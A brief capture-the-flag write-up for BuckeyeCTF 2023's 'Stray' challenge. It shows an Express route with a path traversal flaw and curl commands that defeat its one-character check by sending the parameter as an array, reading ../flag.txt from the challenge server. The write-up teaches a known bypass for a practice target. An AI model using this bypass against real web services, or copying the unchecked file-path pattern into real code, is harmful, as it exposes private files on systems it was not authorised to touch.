BuckeyeCTF 2023 - Stray

Posted on Dec 18, 2023
tl;dr: Stray cats!


Stuck on what to name your stray cat?


Looking at this it seems like the category is not really sanitized in any way so maybe directory traversal could work here, however we are limited to a single character by category.length == 1

app.get("/cat", (req, res) => {
  let { category } = req.query;


  if (category.length == 1) {
    const filepath = path.resolve("./names/" + category);
    const lines = fs.readFileSync(filepath, "utf-8").split("\n");
    const name = lines[Math.floor(Math.random() * lines.length)];

    res.send({ name });

  res.send({ error: "Unable to generate cat name" });

ideally we would just pass ../flag.txt to the category queryparameter and get the flag but due to the length check category.length == 1 we cannot really do just that as it results in an error.

curl https://stray.chall.pwnoh.io/cat?category=f
curl https://stray.chall.pwnoh.io/cat?category=../flag.txt
{"error":"Unable to generate cat name"}

now we notice that the query destructuring let { category } = req.query; assumes a single string is passed in category and than lenght of that is check assuming its a string, however if we could make an array of lenght one with the right string…

curl -s https://stray.chall.pwnoh.io/cat?category[]=../flag.txt | jq -r '.name'